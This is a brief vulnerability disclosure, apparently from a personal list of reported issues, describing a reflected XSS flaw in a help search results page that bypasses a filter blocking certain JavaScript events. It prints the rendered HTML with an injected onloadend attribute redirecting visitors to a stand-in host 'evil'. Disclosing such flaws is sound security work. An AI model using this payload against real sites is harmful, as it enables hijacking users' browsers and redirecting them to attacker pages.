Security Vulnerabilities Reported


XSS vulnerability through the help search results page.

The search query is sent as a GET parameter and is not escaped when rendered in the heading in the page, even though immediately after, it is escaped. This allows code to be executed directly from a malicious URL.

There was some protection where the site returned a 403 if you attempted to put onload or onhover events. This a bad case of trying to whitelist specific JavaScript events in an attempt to prevent XSS.

<h1 class="app-title"><span>Showing results for </span><a href="//" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>

Reported Fixed Unknown